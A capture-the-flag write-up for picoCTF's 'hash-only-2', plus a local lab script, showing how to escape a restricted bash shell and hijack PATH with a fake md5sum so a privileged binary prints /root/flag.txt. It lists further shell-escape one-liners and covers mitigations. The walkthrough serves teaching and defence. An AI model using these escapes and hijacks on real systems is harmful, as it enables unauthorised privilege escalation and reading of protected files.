hash-only-2

Published: April 2, 2025

Description

The second flaghasher binary lives in /usr/local/bin and still shells out to md5sum. Escape the restricted shell, drop a fake md5sum earlier in PATH, and cat the flag.

SSH to rescued-float.picoctf.net -p 49568 (password f3b61b38).

Locate /usr/local/bin/flaghasher and spawn an unrestricted shell (`bash`).

ssh -p 49568 ctf-player@rescued-float.picoctf.net
find / -type f -iname flaghasher 2>/dev/null
bash
cd /usr/local/bin && echo "/bin/cat /root/flag.txt" > md5sum && chmod +x md5sum
export PATH=.:$PATH && ./flaghasher

Solution

  1. Step 1: Escape rbash restrictions
    The login shell is restricted, so run `bash` to allow directory changes and PATH edits. Then `cd /usr/local/bin`.

    Restricted bash (rbash, or bash started with -r) prevents users from changing directories with cd, setting or unsetting PATH, SHELL, ENV and BASH_ENV, redirecting output, and running commands whose names contain a slash, among other restrictions. System administrators use it to lock down SSH accounts to a narrow set of approved commands.

    The classic escape is to invoke a full shell binary. The restriction is a property of how the shell was started, not of the account, so if bash or sh is reachable through PATH, running it by bare name (no slash, no -r flag) drops you into an unrestricted session. Other escapes include launching a text editor (vim's :shell or :!sh), using scripting interpreters (python3 -c 'import pty; pty.spawn("/bin/bash")'), or abusing allowed programs that themselves spawn shells (man or other pagers with !/bin/sh). A quick check after any attempt is `echo $-`: bash includes an r in that string while it is restricted. rbash only holds when PATH points solely at a directory of vetted commands and none of those commands can spawn a shell.

    In real-world penetration testing, restricted shells come up frequently after gaining initial SSH access to a locked-down account. Escaping rbash is one of the first post-exploitation steps and is covered extensively in OSCP and other security certifications.

  2. Step 2: Hijack md5sum again
    Write a md5sum wrapper that cats /root/flag.txt, make it executable, prepend `.` to PATH, and execute flaghasher to dump the flag.

    PATH hijacking exploits how Unix-like systems resolve command names. When a program calls system("md5sum ...") the command line is handed to /bin/sh -c, and the shell searches each directory in PATH left to right and runs the first match it finds; the execlp/execvp family performs the same lookup inside libc. Only an absolute path (or execve with a fixed path) skips the search.

    By prepending . (the current directory) to PATH and dropping a script named md5sum there, you guarantee the lookup hits your script before /usr/bin/md5sum. The script needs execute permission and runs as the process's effective user, which is what makes /root/flag.txt readable here. This is the same reason . (or any attacker-writable directory) in root's PATH is dangerous: a command typed under sudo can resolve to a planted file.

    Real-world mitigations include calling helpers by absolute path (or execve with a fixed path), resetting PATH to a known-good value at program start and ignoring the caller's environment in anything privileged (sudo does this with env_reset and secure_path), and applying the principle of least privilege so the target binary never runs with elevated permissions. The weakness class is CWE-426 (Untrusted Search Path), and advisories for it in commercial software appear in CVE databases regularly.
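The two steps above, rebuilt locally as an added example (not part of the picoCTF challenge or this writeup) so the mechanism can be run without a setuid binary. It creates a throwaway directory holding a stand-in flaghasher that calls md5sum by bare name, the attacker's fake md5sum, and a hardened stand-in that uses an absolute path and a reset PATH; it also includes the `$-` probe for checking whether a shell is restricted. The file names flaghasher_vuln, flaghasher_safe and flag.txt and the flag value picoCTF{example_flag} are assumptions constructed for the example.

```bash
#!/bin/sh
# Added example, not part of the picoCTF challenge or the original writeup.
# Rebuilds the technique in a temp directory with no setuid binary involved.
# Assumed names: flaghasher_vuln, flaghasher_safe, flag.txt; the flag value
# picoCTF{example_flag} is constructed sample data.

# Step 1 check: bash records the restricted flag as 'r' in $-.
# $1 is the shell command line to probe, e.g. "bash -r" or "sh".
shell_mode_of() {
    $1 -c 'case $- in *r*) echo restricted ;; *) echo unrestricted ;; esac'
}

# Build the lab directory and print its path.
setup_lab() {
    lab=$(mktemp -d) || return 1
    # Stand-in for /root/flag.txt (constructed sample data).
    printf 'picoCTF{example_flag}\n' > "$lab/flag.txt"

    # Vulnerable stand-in: "md5sum" is resolved through $PATH, left to right,
    # exactly as it would be inside system("md5sum ...").
    cat > "$lab/flaghasher_vuln" <<'EOF'
#!/bin/sh
md5sum "$1" | cut -d ' ' -f 1
EOF

    # Hardened stand-in: absolute path AND a reset PATH, so neither a "."
    # entry nor any other caller-controlled directory decides what runs.
    cat > "$lab/flaghasher_safe" <<'EOF'
#!/bin/sh
PATH=/usr/bin:/bin
export PATH
/usr/bin/md5sum "$1" | cut -d ' ' -f 1
EOF

    # Step 2: the attacker's fake md5sum. It ignores its argument and dumps
    # the flag, like the one-liner in the writeup (with a shebang added).
    printf '#!/bin/sh\n/bin/cat "%s/flag.txt"\n' "$lab" > "$lab/md5sum"
    chmod +x "$lab/flaghasher_vuln" "$lab/flaghasher_safe" "$lab/md5sum"
    echo "$lab"
}

# Run one stand-in ($2 = vuln or safe) from inside the lab directory with
# "." prepended to PATH, mirroring `export PATH=.:$PATH && ./flaghasher`.
run_with_hijacked_path() {
    ( cd "$1" && PATH=".:$PATH" "./flaghasher_$2" flag.txt )
}

lab=$(setup_lab)
echo "vulnerable stand-in (prints the flag):  $(run_with_hijacked_path "$lab" vuln)"
echo "hardened stand-in (prints a real hash): $(run_with_hijacked_path "$lab" safe)"
echo "shell mode under 'bash -r':             $(shell_mode_of 'bash -r')"
rm -rf "$lab"
```

The vulnerable stand-in prints the flag because sh finds ./md5sum first; the hardened one prints the genuine MD5 of flag.txt in the same poisoned environment, which is the behaviour an absolute path plus a reset PATH buys you.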

Flag

picoCTF{Co-@utH0r_Of_Sy5tem_b!n@riEs_fc06...}

Same technique as hash-only-1; only the binary's path and the restricted login shell differ.
